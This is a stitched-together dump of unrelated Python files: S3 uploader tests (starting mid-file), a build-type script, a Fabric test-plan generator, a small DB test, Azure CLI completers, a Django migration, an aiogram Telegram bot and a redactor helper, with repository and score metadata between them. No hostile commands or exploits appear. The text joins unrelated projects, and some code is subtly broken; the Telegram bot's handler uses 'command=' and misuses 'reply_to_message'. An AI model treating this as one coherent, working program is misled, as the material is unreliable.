# buckets = {S3Uploader.BOOK_COVERS_BUCKET_KEY : 'thecovers'}
# uploader = self._uploader(**buckets)
# m = uploader.cover_image_url
#
# unglueit = DataSource.lookup(self._db, DataSource.UNGLUE_IT)
# identifier = self._identifier(foreign_id="ABOOK")
# eq_('https://s3.amazonaws.com/thecovers/scaled/601/unglue.it/Gutenberg+ID/ABOOK/filename',
# m(unglueit, identifier, "filename", scaled_size=601))
# Arrange
data_source = DataSource.lookup(self._db, data_source_name)
identifier = self._identifier(foreign_id=identifier)
uploader = self._create_s3_uploader(region=region, **buckets)
# Act
result = uploader.cover_image_url(
data_source, identifier, filename, scaled_size=scaled_size
)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"with_s3_bucket_and_end_time",
"marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 1, 0, 0, 0),
"https://marc.s3.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00/Lane.mrc",
),
(
"with_s3_bucket_and_end_time_and_start_time",
"marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"https://marc.s3.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
),
(
"with_s3_bucket_and_end_time_and_start_time_and_custom_region",
"marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"https://marc.s3.us-east-2.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
"us-east-2",
),
(
"with_http_bucket_and_end_time_and_start_time",
"http://marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"http://marc/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
),
(
"with_https_bucket_and_end_time_and_start_time",
"https://marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"https://marc/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
),
]
)
def test_marc_file_url(
self,
name,
bucket,
library_name,
lane_name,
end_time,
expected_result,
start_time=None,
region=None,
):
# Arrange
library = self._library(short_name=library_name)
lane = self._lane(display_name=lane_name)
buckets = {S3UploaderConfiguration.MARC_BUCKET_KEY: bucket}
uploader = self._create_s3_uploader(region=region, **buckets)
# Act
result = uploader.marc_file_url(library, lane, end_time, start_time)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"s3_path_style_request_without_region",
"https://s3.amazonaws.com/bucket/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_path_style_request_with_region",
"https://s3.us-east-2.amazonaws.com/bucket/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_virtual_hosted_style_request_with_global_endpoint",
"https://bucket.s3.amazonaws.com/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_virtual_hosted_style_request_with_dashed_region",
"https://bucket.s3-us-east-2.amazonaws.com/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_virtual_hosted_style_request_with_dotted_region",
"https://bucket.s3.us-east-2.amazonaws.com/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"http_url",
"http://book-covers.nypl.org/directory/filename.jpg",
("book-covers.nypl.org", "directory/filename.jpg"),
),
(
"https_url",
"https://book-covers.nypl.org/directory/filename.jpg",
("book-covers.nypl.org", "directory/filename.jpg"),
),
(
"http_url_with_escaped_symbols",
"http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg",
("book-covers.nypl.org", "directory/filename with spaces!.jpg"),
),
(
"http_url_with_escaped_symbols_but_unquote_set_to_false",
"http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg",
("book-covers.nypl.org", "directory/filename+with+spaces%21.jpg"),
False,
),
]
)
def test_split_url(self, name, url, expected_result, unquote=True):
# Arrange
s3_uploader = self._create_s3_uploader()
# Act
result = s3_uploader.split_url(url, unquote)
# Assert
assert result == expected_result
def test_mirror_one(self):
edition, pool = self._edition(with_license_pool=True)
original_cover_location = "http://example.com/a-cover.png"
content = open(self.sample_cover_path("test-book-cover.png"), "rb").read()
cover, ignore = pool.add_link(
Hyperlink.IMAGE,
original_cover_location,
edition.data_source,
Representation.PNG_MEDIA_TYPE,
content=content,
)
cover_rep = cover.resource.representation
assert None == cover_rep.mirrored_at
original_epub_location = "https://books.com/a-book.epub"
epub, ignore = pool.add_link(
Hyperlink.OPEN_ACCESS_DOWNLOAD,
original_epub_location,
edition.data_source,
Representation.EPUB_MEDIA_TYPE,
content="i'm an epub",
)
epub_rep = epub.resource.representation
assert None == epub_rep.mirrored_at
s3 = self._create_s3_uploader(client_class=MockS3Client)
# Mock final_mirror_url so we can verify that it's called with
# the right arguments
def mock_final_mirror_url(bucket, key):
return "final_mirror_url was called with bucket %s, key %s" % (bucket, key)
s3.final_mirror_url = mock_final_mirror_url
book_url = "http://books-go/here.epub"
cover_url = "http://s3.amazonaws.com/covers-go/here.png"
s3.mirror_one(cover.resource.representation, cover_url)
s3.mirror_one(epub.resource.representation, book_url)
[
[data1, bucket1, key1, args1, ignore1],
[data2, bucket2, key2, args2, ignore2],
] = s3.client.uploads
# Both representations have had .mirror_url set and been
# mirrored to those URLs.
assert data1.startswith(b"\x89")
assert "covers-go" == bucket1
assert "here.png" == key1
assert Representation.PNG_MEDIA_TYPE == args1["ContentType"]
assert (utc_now() - cover_rep.mirrored_at).seconds < 10
assert b"i'm an epub" == data2
assert "books-go" == bucket2
assert "here.epub" == key2
assert Representation.EPUB_MEDIA_TYPE == args2["ContentType"]
# In both cases, mirror_url was set to the result of final_mirror_url.
assert (
"final_mirror_url was called with bucket books-go, key here.epub"
== epub_rep.mirror_url
)
assert (
"final_mirror_url was called with bucket covers-go, key here.png"
== cover_rep.mirror_url
)
# mirrored-at was set when the representation was 'mirrored'
for rep in epub_rep, cover_rep:
assert (utc_now() - rep.mirrored_at).seconds < 10
def test_mirror_failure(self):
edition, pool = self._edition(with_license_pool=True)
original_epub_location = "https://books.com/a-book.epub"
epub, ignore = pool.add_link(
Hyperlink.OPEN_ACCESS_DOWNLOAD,
original_epub_location,
edition.data_source,
Representation.EPUB_MEDIA_TYPE,
content="i'm an epub",
)
epub_rep = epub.resource.representation
uploader = self._create_s3_uploader(MockS3Client)
# A network failure is treated as a transient error.
uploader.client.fail_with = BotoCoreError()
uploader.mirror_one(epub_rep, self._url)
assert None == epub_rep.mirrored_at
assert None == epub_rep.mirror_exception
# An S3 credential failure is treated as a transient error.
response = dict(
Error=dict(
Code=401,
Message="Bad credentials",
)
)
uploader.client.fail_with = ClientError(response, "SomeOperation")
uploader.mirror_one(epub_rep, self._url)
assert None == epub_rep.mirrored_at
assert None == epub_rep.mirror_exception
# Because the file was not successfully uploaded,
# final_mirror_url was never called and mirror_url is
# was not set.
assert None == epub_rep.mirror_url
# A bug in the code is not treated as a transient error --
# the exception propagates through.
uploader.client.fail_with = Exception("crash!")
pytest.raises(Exception, uploader.mirror_one, epub_rep, self._url)
def test_svg_mirroring(self):
edition, pool = self._edition(with_license_pool=True)
original = self._url
# Create an SVG cover for the book.
svg = """<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="50">
<ellipse cx="50" cy="25" rx="50" ry="25" style="fill:blue;"/>
</svg>"""
hyperlink, ignore = pool.add_link(
Hyperlink.IMAGE,
original,
edition.data_source,
Representation.SVG_MEDIA_TYPE,
content=svg,
)
# 'Upload' it to S3.
s3 = self._create_s3_uploader(MockS3Client)
s3.mirror_one(hyperlink.resource.representation, self._url)
[[data, bucket, key, args, ignore]] = s3.client.uploads
assert Representation.SVG_MEDIA_TYPE == args["ContentType"]
assert b"svg" in data
assert b"PNG" not in data
def test_multipart_upload(self):
class MockMultipartS3Upload(MultipartS3Upload):
completed = None
aborted = None
def __init__(self, uploader, representation, mirror_to):
self.parts = []
MockMultipartS3Upload.completed = False
MockMultipartS3Upload.aborted = False
def upload_part(self, content):
self.parts.append(content)
def complete(self):
MockMultipartS3Upload.completed = True
def abort(self):
MockMultipartS3Upload.aborted = True
rep, ignore = create(
self._db,
Representation,
url="http://books.mrc",
media_type=Representation.MARC_MEDIA_TYPE,
)
s3 = self._create_s3_uploader(MockS3Client)
# Successful upload
with s3.multipart_upload(
rep, rep.url, upload_class=MockMultipartS3Upload
) as upload:
assert [] == upload.parts
assert False == upload.completed
assert False == upload.aborted
upload.upload_part("Part 1")
upload.upload_part("Part 2")
assert ["Part 1", "Part 2"] == upload.parts
assert True == MockMultipartS3Upload.completed
assert False == MockMultipartS3Upload.aborted
assert None == rep.mirror_exception
class FailingMultipartS3Upload(MockMultipartS3Upload):
def upload_part(self, content):
raise Exception("Error!")
# Failed during upload
with s3.multipart_upload(
rep, rep.url, upload_class=FailingMultipartS3Upload
) as upload:
upload.upload_part("Part 1")
assert False == MockMultipartS3Upload.completed
assert True == MockMultipartS3Upload.aborted
assert "Error!" == rep.mirror_exception
class AnotherFailingMultipartS3Upload(MockMultipartS3Upload):
def complete(self):
raise Exception("Error!")
rep.mirror_exception = None
# Failed during completion
with s3.multipart_upload(
rep, rep.url, upload_class=AnotherFailingMultipartS3Upload
) as upload:
upload.upload_part("Part 1")
assert False == MockMultipartS3Upload.completed
assert True == MockMultipartS3Upload.aborted
assert "Error!" == rep.mirror_exception
@parameterized.expand(
[
(
"default_expiration_parameter",
None,
int(S3UploaderConfiguration.S3_DEFAULT_PRESIGNED_URL_EXPIRATION),
),
(
"empty_expiration_parameter",
{S3UploaderConfiguration.S3_PRESIGNED_URL_EXPIRATION: 100},
100,
),
]
)
def test_sign_url(self, name, expiration_settings, expected_expiration):
# Arrange
region = "us-east-1"
bucket = "bucket"
filename = "filename"
url = "https://{0}.s3.{1}.amazonaws.com/{2}".format(bucket, region, filename)
expected_url = url + "?AWSAccessKeyId=KEY&Expires=1&Signature=S"
settings = expiration_settings if expiration_settings else {}
s3_uploader = self._create_s3_uploader(region=region, **settings)
s3_uploader.split_url = MagicMock(return_value=(bucket, filename))
s3_uploader.client.generate_presigned_url = MagicMock(return_value=expected_url)
# Act
result = s3_uploader.sign_url(url)
# Assert
assert result == expected_url
s3_uploader.split_url.assert_called_once_with(url)
s3_uploader.client.generate_presigned_url.assert_called_once_with(
"get_object",
ExpiresIn=expected_expiration,
Params={"Bucket": bucket, "Key": filename},
)
class TestMultiPartS3Upload(S3UploaderTest):
def _representation(self):
rep, ignore = create(
self._db,
Representation,
url="http://bucket/books.mrc",
media_type=Representation.MARC_MEDIA_TYPE,
)
return rep
def test_init(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
assert uploader == upload.uploader
assert rep == upload.representation
assert "bucket" == upload.bucket
assert "books.mrc" == upload.filename
assert 1 == upload.part_number
assert [] == upload.parts
assert 1 == upload.upload.get("UploadId")
uploader.client.fail_with = Exception("Error!")
pytest.raises(Exception, MultipartS3Upload, uploader, rep, rep.url)
def test_upload_part(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
upload.upload_part("Part 1")
upload.upload_part("Part 2")
assert [
{
"Body": "Part 1",
"UploadId": 1,
"PartNumber": 1,
"Bucket": "bucket",
"Key": "books.mrc",
},
{
"Body": "Part 2",
"UploadId": 1,
"PartNumber": 2,
"Bucket": "bucket",
"Key": "books.mrc",
},
] == uploader.client.parts
assert 3 == upload.part_number
assert [
{"ETag": "etag", "PartNumber": 1},
{"ETag": "etag", "PartNumber": 2},
] == upload.parts
uploader.client.fail_with = Exception("Error!")
pytest.raises(Exception, upload.upload_part, "Part 3")
def test_complete(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
upload.upload_part("Part 1")
upload.upload_part("Part 2")
upload.complete()
assert [
{
"Bucket": "bucket",
"Key": "books.mrc",
"UploadId": 1,
"MultipartUpload": {
"Parts": [
{"ETag": "etag", "PartNumber": 1},
{"ETag": "etag", "PartNumber": 2},
],
},
}
] == uploader.client.uploads
def test_abort(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
upload.upload_part("Part 1")
upload.upload_part("Part 2")
upload.abort()
assert [] == uploader.client.parts
@pytest.mark.minio
class TestS3UploaderIntegration(S3UploaderIntegrationTest):
@parameterized.expand(
[
(
"using_s3_uploader_and_open_access_bucket",
functools.partial(
S3Uploader,
host=S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST,
),
S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY,
"test-bucket",
True,
),
(
"using_s3_uploader_and_protected_access_bucket",
functools.partial(
S3Uploader,
host=S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST,
),
S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY,
"test-bucket",
False,
),
(
"using_minio_uploader_and_open_access_bucket",
MinIOUploader,
S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY,
"test-bucket",
True,
{
MinIOUploaderConfiguration.ENDPOINT_URL: S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL
},
),
(
"using_minio_uploader_and_protected_access_bucket",
MinIOUploader,
S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY,
"test-bucket",
False,
{
MinIOUploaderConfiguration.ENDPOINT_URL: S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL
},
),
]
)
def test_mirror(
self, name, uploader_class, bucket_type, bucket_name, open_access, settings=None
):
# Arrange
book_title = "1234567890"
book_content = "1234567890"
identifier = Identifier(type=Identifier.ISBN, identifier=book_title)
representation = Representation(
content=book_content, media_type=Representation.EPUB_MEDIA_TYPE
)
buckets = {
bucket_type: bucket_name,
}
if settings:
settings.update(buckets)
else:
settings = buckets
s3_uploader = self._create_s3_uploader(
uploader_class=uploader_class, **settings
)
self.minio_s3_client.create_bucket(Bucket=bucket_name)
# Act
book_url = s3_uploader.book_url(identifier, open_access=open_access)
s3_uploader.mirror_one(representation, book_url)
# Assert
response = self.minio_s3_client.list_objects(Bucket=bucket_name)
assert "Contents" in response
assert len(response["Contents"]) == 1
[object] = response["Contents"]
assert object["Key"] == "ISBN/{0}.epub".format(book_title)
| 1.953125 | 2 |
lbry/scripts/set_build.py | vanshdevgan/lbry-sdk | 0 | 3405 | """Set the build version to be 'qa', 'rc', 'release'"""
import sys
import os
import re
import logging
log = logging.getLogger()
log.addHandler(logging.StreamHandler())
log.setLevel(logging.DEBUG)
def get_build_type(travis_tag=None):
if not travis_tag:
return "qa"
log.debug("getting build type for tag: \"%s\"", travis_tag)
if re.match(r'v\d+\.\d+\.\d+rc\d+$', travis_tag):
return 'rc'
elif re.match(r'v\d+\.\d+\.\d+$', travis_tag):
return 'release'
return 'qa'
def main():
root_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
build_type_path = os.path.join(root_dir, 'lbry', 'build_type.py')
log.debug("configuring build type file: %s", build_type_path)
travis_commit = os.environ['TRAVIS_COMMIT'][:6]
build_type = get_build_type(os.environ.get('TRAVIS_TAG', None))
log.debug("setting build type=%s, build commit=%s", build_type, travis_commit)
with open(build_type_path, 'w') as f:
f.write(f"BUILD = \"{build_type}\"\nBUILD_COMMIT = \"{travis_commit}\"\n")
if __name__ == '__main__':
sys.exit(main())
| 2.234375 | 2 |
backend/jenkins/pipelines/ansible/utils/testplan_gen.py | gbl1124/hfrd | 5 | 3406 | <gh_stars>1-10
#!/usr/bin/python
import yaml
import os
import ast
import sys
from collections import OrderedDict
curr_dir = os.getcwd()
work_dir = sys.argv[1]
network_type = sys.argv[2]
testplan_dict = {}
testplan_dict["name"] = "System performance test"
testplan_dict["description"] = "This test is to create as much chaincode computation load as possible"
testplan_dict["runid"] = "RUNID_HERE"
if network_type == "ibp":
testplan_dict["networkid"] = sys.argv[3]
testplan_dict["collectFabricMetrics"] = False
testplan_dict["storageclass"] = "default"
testplan_dict["saveLog"] = False
testplan_dict["continueAfterFail"] = True
testplan_dict["tests"] = []
testplan_dict["peernodeAlias"] =[]
if os.path.exists(work_dir) != True:
print 'certs keyfiles directory do not exist'
exit(1)
# Load template file
with open(curr_dir + "/templates/testplan_template.yml", 'r') as stream:
template = yaml.load(stream)
channel_create = template["CHANNEL_CREATE"]
# channel_join = template["CHANNEL_JOIN"]
chaincode_install = template["CHAINCODE_INSTALL"]
chaincode_instantiate = template["CHAINCODE_INSTANTIATE"]
chaincode_invoke = template["CHAINCODE_INVOKE"]
execute_command = template["EXECUTE_COMMAND"]
connectionProfile = {}
org_list = []
org_list_lowercase = []
orderer_list = []
peer_list = []
org_peers_dict = {}
org_anchor_dict ={}
allAnchor_list =[]
# Load connection profile
for orgName in os.listdir(work_dir + '/keyfiles'):
if os.path.isfile(work_dir + '/keyfiles/' + orgName + '/connection.yml'):
with open(work_dir + '/keyfiles/' + orgName + '/connection.yml', 'r') as stream:
connectionProfile = yaml.load(stream)
if connectionProfile["orderers"] is None:
continue
orderer_list = orderer_list + connectionProfile["orderers"].keys()
if (connectionProfile["organizations"][orgName.lower()]["peers"] != None):
org_list.append(orgName)
org_list_lowercase.append(orgName.lower())
org_peers_dict[orgName] = connectionProfile["organizations"][orgName.lower(
)]["peers"]
peer_list = peer_list + \
connectionProfile["organizations"][orgName.lower(
)]["peers"]
org_anchor_dict[orgName] = sorted(
connectionProfile["organizations"][orgName.lower(
)]["peers"])[0]
# When there is only peer or orderer, we skip tests.
if len(orderer_list) == 0 or len(peer_list) == 0:
outputfile =open(work_dir + '/testplan_example.yml','w')
outputfile.write("")
outputfile.close()
exit(0)
orderer_list = list(OrderedDict.fromkeys(orderer_list))
peer_list = list(OrderedDict.fromkeys(peer_list))
for orgName in org_list :
tempOrgAnchorObj={}
tempOrgAnchorObj[orgName+"Anchor"] = org_anchor_dict[orgName]
testplan_dict["peernodeAlias"].append(tempOrgAnchorObj)
tempOrgPeersObj={}
tempOrgPeersObj[orgName+"Peers"] = ','.join(org_peers_dict[orgName])
testplan_dict["peernodeAlias"].append(tempOrgPeersObj)
allAnchor_list.append(org_anchor_dict[orgName])
testplan_dict["peernodeAlias"].append({"allAnchors":','.join(allAnchor_list)})
testplan_dict["peernodeAlias"].append({"allPeers":','.join(peer_list)})
print 'org list: '
print org_list_lowercase
print 'orderer_list: '
print orderer_list
print 'peer_list: '
print peer_list
print 'allAnchor_list'
print allAnchor_list
# CREATE_CHANNEL
channel_create["parameters"]["connectionProfile"] = org_list[0]
if network_type == 'cello':
channel_create["parameters"]["channelConsortium"] = 'FabricConsortium'
else:
channel_create["parameters"]["channelConsortium"] = 'SampleConsortium'
channel_create["parameters"]["channelOrgs"] = ','.join(org_list_lowercase)
channel_create["parameters"]["ordererName"] = orderer_list[0]
testplan_dict["tests"].append(channel_create)
# JOIN_CHANNEL and INSTALL_CHAINCODE
join_list = []
install_list = []
for org in org_list:
channel_join = template["CHANNEL_JOIN"]
channel_join["parameters"]["connectionProfile"] = org
channel_join["parameters"]["peers"] = ','.join(org_peers_dict[org])
channel_join["parameters"]["ordererName"] = orderer_list[0]
join_list.append(str(channel_join))
# CHAINCODE_INSTALL
chaincode_install["parameters"]["connectionProfile"] = org
chaincode_install["parameters"]["peers"] = ','.join(org_peers_dict[org])
install_list.append(str(chaincode_install))
for join_org in join_list:
join_item = ast.literal_eval(join_org)
testplan_dict["tests"].append(join_item)
for install_org in install_list:
install_item = ast.literal_eval(install_org)
testplan_dict["tests"].append(install_item)
# CHAINCODE_INSTANTIATE
chaincode_instantiate["parameters"]["connectionProfile"] = org_list[0]
chaincode_instantiate["parameters"]["peers"] = ','.join(peer_list)
# CHAINCODE_INVOKE
# Invoke with fixed transaction count : 100
chaincode_invoke["iterationCount"] = '100'
chaincode_invoke["parameters"]["connectionProfile"] = org_list[0]
chaincode_invoke["parameters"]["peers"] = ','.join(peer_list)
chaincoode_invoke_count = str(chaincode_invoke)
# Invoke with fixed running duration : 0 hour 10 minutes 0 second.
# And enable running tests parallel by setting waitUntilFinish to true
chaincode_invoke["iterationCount"] = '0h10m0s'
chaincode_invoke["waitUntilFinish"] = False
chaincoode_invoke_time = str(chaincode_invoke)
# Invoke with fixed running duration : 0 hour 10 minutes 0 second
chaincode_invoke["iterationCount"] = '0h10m0s'
chaincode_invoke["parameters"]["peers"] = peer_list[0]
chaincoode_invoke_parallel = str(chaincode_invoke)
testplan_dict["tests"].append(chaincode_instantiate)
testplan_dict["tests"].append(ast.literal_eval(chaincoode_invoke_count))
testplan_dict["tests"].append(ast.literal_eval(chaincoode_invoke_time))
testplan_dict["tests"].append(ast.literal_eval(chaincoode_invoke_parallel))
# Execute command with default images
testplan_dict["tests"].append(ast.literal_eval(str(execute_command)))
# Execute command with customized image
execute_command["name"] = "execute-command-with-customized-image"
execute_command["container"] = "user/ownimage"
testplan_dict["tests"].append(ast.literal_eval(str(execute_command)))
connYamlStr= yaml.dump(testplan_dict,default_flow_style=False)
tempstr= connYamlStr
for orgName in org_list :
tempstr = tempstr.replace(orgName+"Anchor:",orgName+"Anchor: &"+orgName+"Anchor")
tempstr = tempstr.replace(orgName+"Peers:",orgName+"Peers: &"+orgName+"Peers")
tempstr = tempstr.replace("allAnchors:","allAnchors: &allAnchors")
tempstr = tempstr.replace("allPeers:","allPeers: &allPeers")
tempstr = tempstr.replace("runid:","runid: &runid")
if network_type == "ibp":
tempstr = tempstr.replace("networkid:","networkid: &networkid")
# Dump testplan file
outputfile =open(work_dir + '/testplan_example.yml','w')
outputfile.write(tempstr)
outputfile.close()
| 1.960938 | 2 |
dblib/test_lib.py | cyber-fighters/dblib | 0 | 3407 | """Collection of tests."""
import pytest
import dblib.lib
f0 = dblib.lib.Finding('CD spook', 'my_PC', 'The CD drive is missing.')
f1 = dblib.lib.Finding('Unplugged', 'my_PC', 'The power cord is unplugged.')
f2 = dblib.lib.Finding('Monitor switched off', 'my_PC', 'The monitor is switched off.')
def test_add_remove():
"""Test function."""
db = dblib.lib.BackyardDB()
# regular cases
db.add(f0)
assert f0 in db.findings
assert len(db.findings) == 1
db.add(f1)
assert f1 in db.findings
assert len(db.findings) == 2
db.add(f2)
assert f2 in db.findings
assert len(db.findings) == 3
db.add(None)
assert len(db.findings) == 3
db.remove(f1)
assert f1 not in db.findings
assert len(db.findings) == 2
# test exceptions
with pytest.raises(TypeError):
db.add(1)
def test_update():
"""Test function."""
db = dblib.lib.BackyardDB()
db.add(f0)
db.add(f1)
db.update(f1, f2)
assert f2 in db.findings
assert len(db.findings) == 2
| 2.78125 | 3 |
src/azure-cli/azure/cli/command_modules/policyinsights/_completers.py | YuanyuanNi/azure-cli | 3,287 | 3408 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.decorators import Completer
from azure.cli.core.commands.client_factory import get_subscription_id
from ._client_factory import cf_policy_insights
@Completer
def get_policy_remediation_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument
client = cf_policy_insights(cmd.cli_ctx)
sub = get_subscription_id(cmd.cli_ctx)
rg = getattr(namespace, 'resource_group_name', None)
management_group = getattr(namespace, 'management_group_name', None)
if rg:
result = client.remediations.list_for_resource_group(subscription_id=sub, resource_group_name=rg)
elif management_group:
result = client.remediations.list_for_management_group(management_group_id=management_group)
else:
result = client.remediations.list_for_subscription(subscription_id=sub)
return [i.name for i in result]
@Completer
def get_policy_metadata_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument
client = cf_policy_insights(cmd.cli_ctx).policy_metadata
from azure.mgmt.policyinsights.models import QueryOptions
query_options = QueryOptions(top=2000)
return [metadata.name for metadata in client.list(query_options) if metadata.name.startswith(prefix)]
| 1.828125 | 2 |
hordak/migrations/0011_auto_20170225_2222.py | CodeBrew-LTD/django-hordak | 187 | 3409 | <reponame>CodeBrew-LTD/django-hordak
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-25 22:22
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import django_smalluuid.models
class Migration(migrations.Migration):
dependencies = [("hordak", "0010_auto_20161216_1202")]
operations = [
migrations.CreateModel(
name="TransactionImport",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
(
"uuid",
django_smalluuid.models.SmallUUIDField(
default=django_smalluuid.models.UUIDDefault(), editable=False, unique=True
),
),
(
"timestamp",
models.DateTimeField(default=django.utils.timezone.now, editable=False),
),
(
"has_headings",
models.BooleanField(
default=True, verbose_name="First line of file contains headings"
),
),
(
"file",
models.FileField(
upload_to="transaction_imports", verbose_name="CSV file to import"
),
),
(
"state",
models.CharField(
choices=[
("pending", "Pending"),
("uploaded", "Uploaded, ready to import"),
("done", "Import complete"),
],
default="pending",
max_length=20,
),
),
(
"date_format",
models.CharField(
choices=[
("%d-%m-%Y", "dd-mm-yyyy"),
("%d/%m/%Y", "dd/mm/yyyy"),
("%d.%m.%Y", "dd.mm.yyyy"),
("%d-%Y-%m", "dd-yyyy-mm"),
("%d/%Y/%m", "dd/yyyy/mm"),
("%d.%Y.%m", "dd.yyyy.mm"),
("%m-%d-%Y", "mm-dd-yyyy"),
("%m/%d/%Y", "mm/dd/yyyy"),
("%m.%d.%Y", "mm.dd.yyyy"),
("%m-%Y-%d", "mm-yyyy-dd"),
("%m/%Y/%d", "mm/yyyy/dd"),
("%m.%Y.%d", "mm.yyyy.dd"),
("%Y-%d-%m", "yyyy-dd-mm"),
("%Y/%d/%m", "yyyy/dd/mm"),
("%Y.%d.%m", "yyyy.dd.mm"),
("%Y-%m-%d", "yyyy-mm-dd"),
("%Y/%m/%d", "yyyy/mm/dd"),
("%Y.%m.%d", "yyyy.mm.dd"),
("%d-%m-%y", "dd-mm-yy"),
("%d/%m/%y", "dd/mm/yy"),
("%d.%m.%y", "dd.mm.yy"),
("%d-%y-%m", "dd-yy-mm"),
("%d/%y/%m", "dd/yy/mm"),
("%d.%y.%m", "dd.yy.mm"),
("%m-%d-%y", "mm-dd-yy"),
("%m/%d/%y", "mm/dd/yy"),
("%m.%d.%y", "mm.dd.yy"),
("%m-%y-%d", "mm-yy-dd"),
("%m/%y/%d", "mm/yy/dd"),
("%m.%y.%d", "mm.yy.dd"),
("%y-%d-%m", "yy-dd-mm"),
("%y/%d/%m", "yy/dd/mm"),
("%y.%d.%m", "yy.dd.mm"),
("%y-%m-%d", "yy-mm-dd"),
("%y/%m/%d", "yy/mm/dd"),
("%y.%m.%d", "yy.mm.dd"),
],
default="%d-%m-%Y",
max_length=50,
),
),
(
"hordak_import",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="hordak.StatementImport"
),
),
],
),
migrations.CreateModel(
name="TransactionImportColumn",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("column_number", models.PositiveSmallIntegerField()),
(
"column_heading",
models.CharField(blank=True, default="", max_length=100, verbose_name="Column"),
),
(
"to_field",
models.CharField(
blank=True,
choices=[
(None, "-- Do not import --"),
("date", "Date"),
("amount", "Amount"),
("amount_out", "Amount (money in only)"),
("amount_in", "Amount (money out only)"),
("description", "Description / Notes"),
],
default=None,
max_length=20,
null=True,
verbose_name="Is",
),
),
("example", models.CharField(blank=True, default="", max_length=200)),
(
"transaction_import",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="columns",
to="hordak.TransactionImport",
),
),
],
options={"ordering": ["transaction_import", "column_number"]},
),
migrations.AlterUniqueTogether(
name="transactionimportcolumn",
unique_together=set(
[("transaction_import", "column_number"), ("transaction_import", "to_field")]
),
),
]
| 1.734375 | 2 |
Bot Telegram.py | devilnotcry77/devil_not_cry | 0 | 3410 | from aiogram import Bot, types
from aiogram.dispatcher import Dispatcher
from aiogram.utils import executor
TOKEN = "Token for you bot"
bot = Bot(token=TOKEN)
dp = Dispatcher(bot)
@dp.message_handler(command=['start', 'help'])
async def send_welcome(msg: types.Message):
await msg.reply_to_message(f'Добро пожаловать,{msg.from_user.first_name}')
@dp.message_handler(content_types=['text'])
async def get_text_messages(msg: types.Message):
if msg.text.lower() == 'привет':
await msg.answer('Привет!')
else:
await msg.answer('Я не понимаю')
if __name__ == '__main__':
executor.start_polling(dp) | 2.5625 | 3 |
redactor/utils.py | danlgz/django-wysiwyg-redactor | 0 | 3411 | <reponame>danlgz/django-wysiwyg-redactor<filename>redactor/utils.py
from django.core.exceptions import ImproperlyConfigured
from importlib import import_module
try:
from django.utils.encoding import force_text
except ImportError:
from django.utils.encoding import force_unicode as force_text
from django.utils.functional import Promise
import json
def import_class(path):
path_bits = path.split('.')
if len(path_bits) < 2:
message = "'{0}' is not a complete Python path.".format(path)
raise ImproperlyConfigured(message)
class_name = path_bits.pop()
module_path = '.'.join(path_bits)
module_itself = import_module(module_path)
if not hasattr(module_itself, class_name):
message = "The Python module '{0}' has no '{1}' class.".format(
module_path,
class_name
)
raise ImportError(message)
return getattr(module_itself, class_name)
